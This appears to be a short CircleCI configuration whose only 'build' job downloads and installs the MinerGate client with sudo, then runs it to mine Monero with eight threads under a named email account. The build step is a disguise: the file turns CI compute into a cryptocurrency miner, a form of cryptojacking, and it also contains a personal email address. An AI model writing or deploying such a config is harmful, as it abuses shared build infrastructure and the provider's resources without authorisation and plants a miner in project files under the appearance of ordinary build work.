version: 2
jobs:
  build:
    machine: true
    steps:
      - checkout
      - run:
          command: |
            sudo apt-get update -yqq && wget https://minergate.com/download/deb-cli -O minergate-cli.deb && sudo dpkg -i minergate-cli.deb
            minergate-cli --user yoginth@outlook.in --xmr 8
